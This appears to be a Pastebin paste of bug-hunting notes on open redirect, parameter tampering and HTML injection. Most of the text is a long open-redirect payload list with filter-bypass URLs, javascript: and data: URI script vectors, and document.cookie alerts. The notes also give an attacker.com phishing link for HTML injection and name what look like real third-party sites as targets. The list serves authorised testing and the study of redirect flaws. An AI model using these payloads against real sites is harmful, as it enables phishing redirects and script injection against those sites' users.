Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- URL Redirection / Open Redirect
- Vuln Description
- ● URL Redirection is used as part of phishing attack .
- https://gla.ac.in/agydsgdbgfnh
- .php?url=/index.php
- .php?url=http://www.google.com
- .js
- ------------------------------------
- URL Redirection through GET Parameters
- ------------------------------------
- How to Hunt URL Redirection
- ● Find any url parameter having some kind of tendency to redirect anywhere
- Common Parameter List
- ++++++++++++++++++++++
- dest redirect uri path continue url
- window to out view dir show navigation Open file
- val validate domain callback return page feed host port next data reference site url html
- -----------------------------------
- Path Redirection
- -----------------------------------
- How to Hunt URL Redirection
- ● URL Redirection on Path Fragments
- example – any.com/payloads --> any.com/bing.com --> any.com//bing.com
- Spider m y dekho --> 3XX
- HTTP Redirection Status Code - 3xx
- 300 Multiple Choices
- 301 Moved Permanently
- 302 Found
- 303 See Other
- 304 Not Modified
- 305 Use Proxy
- 307 Temporary Redirect
- 308 Permanent Redirect
- Intruder --> Options --> Allow Redirection
- Reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect
- _____________________________________________________________________________________
- Background Concept about Parameter Tampering
- The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control.
- Example 1
- The parameter modification of form fields can be considered a typical example of Web Parameter Tampering attack.
- ● For example, consider a user who can select form field values (combo box, check box, etc.) on an application page. When these values are submitted by the user, they could be acquired and arbitrarily manipulated by an attacker.
- Example 2
- <input type=”hidden” id=”1008” name=”cost” value=”70.00”>
- ● In this example, an attacker can modify the “value” information of a specific item, thus lowering its cost.
- Example 3
- http://www.attackbank.com/default.asp?profile=741&debit=1000
- ● In this case, an attacker could tamper with the URL, using other values for profile and debit:
- http://www.attackbank.com/default.asp?profile=852&debit=2000
- --------------------------------------------------------------------------------------
- Concept of HTML Injection
- HTML Injection is a type of injection issue that occours when a user is able to control an input point and is able to inject arbitary HTML code into a vulnerable web page.
- Impact of HTML Injection
- 1. Can allow attacker to modify page.
- 2. DOM Can be loaded.
- 3. Fake Logins/Phising page.
- How to do HTML Injection?
- -> Find an input (GET or POST)
- -> If input reflects back, there may be HTMLi
- -> Exploit if it succeds, You got HTMLi.
- Target:
- testphp.vulnweb.com
- ----------------------------------
- Exploitation:
- <a href="http://attacker.com">Login</a>
- Target:
- Manual:
- http://woodlandworldwide.com
- Via Burp:
- projects.knmi.ml
- ---------------------------------------------------------------------------------
- Payload:
- Open Redirection Payload:
- //localdomain.pw/%2f..
- //www.whitelisteddomain.tld@localdomain.pw/%2f..
- ///localdomain.pw/%2f..
- ///www.whitelisteddomain.tld@localdomain.pw/%2f..
- ////localdomain.pw/%2f..
- ////www.whitelisteddomain.tld@localdomain.pw/%2f..
- https://localdomain.pw/%2f..
- https://www.whitelisteddomain.tld@localdomain.pw/%2f..
- /https://localdomain.pw/%2f..
- /https://www.whitelisteddomain.tld@localdomain.pw/%2f..
- //localdomain.pw/%2f%2e%2e
- //www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- ///localdomain.pw/%2f%2e%2e
- ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- ////localdomain.pw/%2f%2e%2e
- ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- https://localdomain.pw/%2f%2e%2e
- https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- /https://localdomain.pw/%2f%2e%2e
- /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- //localdomain.pw/
- //www.whitelisteddomain.tld@localdomain.pw/
- ///localdomain.pw/
- ///www.whitelisteddomain.tld@localdomain.pw/
- ////localdomain.pw/
- ////www.whitelisteddomain.tld@localdomain.pw/
- https://localdomain.pw/
- https://www.whitelisteddomain.tld@localdomain.pw/
- /https://localdomain.pw/
- /https://www.whitelisteddomain.tld@localdomain.pw/
- //localdomain.pw//
- //www.whitelisteddomain.tld@localdomain.pw//
- ///localdomain.pw//
- ///www.whitelisteddomain.tld@localdomain.pw//
- ////localdomain.pw//
- ////www.whitelisteddomain.tld@localdomain.pw//
- https://localdomain.pw//
- https://www.whitelisteddomain.tld@localdomain.pw//
- //https://localdomain.pw//
- //https://www.whitelisteddomain.tld@localdomain.pw//
- //localdomain.pw/%2e%2e%2f
- //www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
- ///localdomain.pw/%2e%2e%2f
- ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
- ////localdomain.pw/%2e%2e%2f
- ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
- https://localdomain.pw/%2e%2e%2f
- https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
- //https://localdomain.pw/%2e%2e%2f
- //https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
- ///localdomain.pw/%2e%2e
- ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
- ////localdomain.pw/%2e%2e
- ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
- https:///localdomain.pw/%2e%2e
- https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
- //https:///localdomain.pw/%2e%2e
- //www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
- /https://localdomain.pw/%2e%2e
- /https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
- ///localdomain.pw/%2f%2e%2e
- ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- ////localdomain.pw/%2f%2e%2e
- ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- https:///localdomain.pw/%2f%2e%2e
- https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- /https://localdomain.pw/%2f%2e%2e
- /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- /https:///localdomain.pw/%2f%2e%2e
- /https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
- /%09/localdomain.pw
- /%09/www.whitelisteddomain.tld@localdomain.pw
- //%09/localdomain.pw
- //%09/www.whitelisteddomain.tld@localdomain.pw
- ///%09/localdomain.pw
- ///%09/www.whitelisteddomain.tld@localdomain.pw
- ////%09/localdomain.pw
- ////%09/www.whitelisteddomain.tld@localdomain.pw
- https://%09/localdomain.pw
- https://%09/www.whitelisteddomain.tld@localdomain.pw
- /%5clocaldomain.pw
- /%5cwww.whitelisteddomain.tld@localdomain.pw
- //%5clocaldomain.pw
- //%5cwww.whitelisteddomain.tld@localdomain.pw
- ///%5clocaldomain.pw
- ///%5cwww.whitelisteddomain.tld@localdomain.pw
- ////%5clocaldomain.pw
- ////%5cwww.whitelisteddomain.tld@localdomain.pw
- https://%5clocaldomain.pw
- https://%5cwww.whitelisteddomain.tld@localdomain.pw
- /https://%5clocaldomain.pw
- /https://%5cwww.whitelisteddomain.tld@localdomain.pw
- https://localdomain.pw
- https://www.whitelisteddomain.tld@localdomain.pw
- javascript:alert(1);
- javascript:alert(1)
- //javascript:alert(1);
- /javascript:alert(1);
- //javascript:alert(1)
- /javascript:alert(1)
- /%5cjavascript:alert(1);
- /%5cjavascript:alert(1)
- //%5cjavascript:alert(1);
- //%5cjavascript:alert(1)
- /%09/javascript:alert(1);
- /%09/javascript:alert(1)
- java%0d%0ascript%0d%0a:alert(0)
- //localdomain.pw
- http:localdomain.pw
- https:localdomain.pw
- //localdomain%E3%80%82pw
- \/\/localdomain.pw/
- /\/localdomain.pw/
- /%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
- //\/localdomain.pw/
- //localdomain%00.pw
- https://www.whitelisteddomain.tld/https://localdomain.pw/
- ";alert(0);//
- javascript://www.whitelisteddomain.tld?%a0alert%281%29
- http://0xd8.0x3a.0xd6.0xce
- http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
- http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
- http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
- http://0xd83ad6ce
- http://www.whitelisteddomain.tld@0xd83ad6ce
- http://3H6k7lIAiqjfNeN@0xd83ad6ce
- http://XY>.7d8T\205pZM@0xd83ad6ce
- http://3627734734
- http://www.whitelisteddomain.tld@3627734734
- http://3H6k7lIAiqjfNeN@3627734734
- http://XY>.7d8T\205pZM@3627734734
- http://472.314.470.462
- http://www.whitelisteddomain.tld@472.314.470.462
- http://3H6k7lIAiqjfNeN@472.314.470.462
- http://XY>.7d8T\205pZM@472.314.470.462
- http://0330.072.0326.0316
- http://www.whitelisteddomain.tld@0330.072.0326.0316
- http://3H6k7lIAiqjfNeN@0330.072.0326.0316
- http://XY>.7d8T\205pZM@0330.072.0326.0316
- http://00330.00072.0000326.00000316
- http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
- http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
- http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
- http://[::216.58.214.206]
- http://www.whitelisteddomain.tld@[::216.58.214.206]
- http://3H6k7lIAiqjfNeN@[::216.58.214.206]
- http://XY>.7d8T\205pZM@[::216.58.214.206]
- http://[::ffff:216.58.214.206]
- http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
- http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
- http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
- http://0xd8.072.54990
- http://www.whitelisteddomain.tld@0xd8.072.54990
- http://3H6k7lIAiqjfNeN@0xd8.072.54990
- http://XY>.7d8T\205pZM@0xd8.072.54990
- http://0xd8.3856078
- http://www.whitelisteddomain.tld@0xd8.3856078
- http://3H6k7lIAiqjfNeN@0xd8.3856078
- http://XY>.7d8T\205pZM@0xd8.3856078
- http://00330.3856078
- http://www.whitelisteddomain.tld@00330.3856078
- http://3H6k7lIAiqjfNeN@00330.3856078
- http://XY>.7d8T\205pZM@00330.3856078
- http://00330.0x3a.54990
- http://www.whitelisteddomain.tld@00330.0x3a.54990
- http://3H6k7lIAiqjfNeN@00330.0x3a.54990
- http://XY>.7d8T\205pZM@00330.0x3a.54990
- http:0xd8.0x3a.0xd6.0xce
- http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
- http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
- http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
- http:0xd83ad6ce
- http:www.whitelisteddomain.tld@0xd83ad6ce
- http:3H6k7lIAiqjfNeN@0xd83ad6ce
- http:XY>.7d8T\205pZM@0xd83ad6ce
- http:3627734734
- http:www.whitelisteddomain.tld@3627734734
- http:3H6k7lIAiqjfNeN@3627734734
- http:XY>.7d8T\205pZM@3627734734
- http:472.314.470.462
- http:www.whitelisteddomain.tld@472.314.470.462
- http:3H6k7lIAiqjfNeN@472.314.470.462
- http:XY>.7d8T\205pZM@472.314.470.462
- http:0330.072.0326.0316
- http:www.whitelisteddomain.tld@0330.072.0326.0316
- http:3H6k7lIAiqjfNeN@0330.072.0326.0316
- http:XY>.7d8T\205pZM@0330.072.0326.0316
- http:00330.00072.0000326.00000316
- http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
- http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
- http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
- http:[::216.58.214.206]
- http:www.whitelisteddomain.tld@[::216.58.214.206]
- http:3H6k7lIAiqjfNeN@[::216.58.214.206]
- http:XY>.7d8T\205pZM@[::216.58.214.206]
- http:[::ffff:216.58.214.206]
- http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
- http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
- http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
- http:0xd8.072.54990
- http:www.whitelisteddomain.tld@0xd8.072.54990
- http:3H6k7lIAiqjfNeN@0xd8.072.54990
- http:XY>.7d8T\205pZM@0xd8.072.54990
- http:0xd8.3856078
- http:www.whitelisteddomain.tld@0xd8.3856078
- http:3H6k7lIAiqjfNeN@0xd8.3856078
- http:XY>.7d8T\205pZM@0xd8.3856078
- http:00330.3856078
- http:www.whitelisteddomain.tld@00330.3856078
- http:3H6k7lIAiqjfNeN@00330.3856078
- http:XY>.7d8T\205pZM@00330.3856078
- http:00330.0x3a.54990
- http:www.whitelisteddomain.tld@00330.0x3a.54990
- http:3H6k7lIAiqjfNeN@00330.0x3a.54990
- http:XY>.7d8T\205pZM@00330.0x3a.54990
- 〱localdomain.pw
- 〵localdomain.pw
- ゝlocaldomain.pw
- ーlocaldomain.pw
- ーlocaldomain.pw
- /〱localdomain.pw
- /〵localdomain.pw
- /ゝlocaldomain.pw
- /ーlocaldomain.pw
- /ーlocaldomain.pw
- %68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
- https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
- <>javascript:alert(1);
- <>//localdomain.pw
- //localdomain.pw\@www.whitelisteddomain.tld
- https://:@localdomain.pw\@www.whitelisteddomain.tld
- \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
- \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
- ja\nva\tscript\r:alert(1)
- \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
- \152\141\166\141\163\143\162\151\160\164\072alert(1)
- http://localdomain.pw:80#@www.whitelisteddomain.tld/
- http://localdomain.pw:80?@www.whitelisteddomain.tld/
- http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
- http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
- http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
- http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
- http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
- http://localdomain.pw\twww.whitelisteddomain.tld/
- //localdomain.pw:80#@www.whitelisteddomain.tld/
- //localdomain.pw:80?@www.whitelisteddomain.tld/
- //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
- //XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
- //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
- //XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
- //www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
- //localdomain.pw\twww.whitelisteddomain.tld/
- //;@localdomain.pw
- http://;@localdomain.pw
- @localdomain.pw
- javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
- http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
- http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
- http://localdomain.pw%3F.www.whitelisteddomain.tld/
- http://localdomain.pw%23.www.whitelisteddomain.tld/
- http://www.whitelisteddomain.tld:80%40localdomain.pw/
- http://www.whitelisteddomain.tld%2elocaldomain.pw/
- /x:1/:///%01javascript:alert(document.cookie)/
- /https:/%5clocaldomain.pw/
- https:/%5clocaldomain.pw/
- javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
- /http://localdomain.pw
- /%2f%2flocaldomain.pw
- //%2f%2flocaldomain.pw
- /localdomain.pw/%2f%2e%2e
- /http:/localdomain.pw
- http:/localdomain.pw
- /.localdomain.pw
- http://.localdomain.pw
- .localdomain.pw
- ///\;@localdomain.pw
- ///localdomain.pw
- /////localdomain.pw/
- /////localdomain.pw
- java%0ascript:alert(1)
- java%09script:alert(1)
- java%0dscript:alert(1)
- javascript://%0aalert(1)
- Javas%26%2399;ript:alert(1)
- data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
- jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
- http://www.localdomain.pw\.www.whitelisteddomain.tld
- %19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
- %01https://localdomain.pw
- www.whitelisteddomain.tld;@localdomain.pw
- https://www.whitelisteddomain.tld;@localdomain.pw
- http:%0a%0dlocaldomain.pw
- https://%0a%0dlocaldomain.pw
- localdomain.pw/www.whitelisteddomain.tld
- https://localdomain.pw/www.whitelisteddomain.tld
- //localdomain.pw/www.whitelisteddomain.tld
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- //https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- //https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- //https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- //https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- //https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- //www.whitelisteddomain.tld@https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
- ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
- /%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ///%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ///%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ////%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ////%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ///%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ///%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ////%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- ////%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- /https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- http:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- https:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
- //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
- \/\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- /\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
- //\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
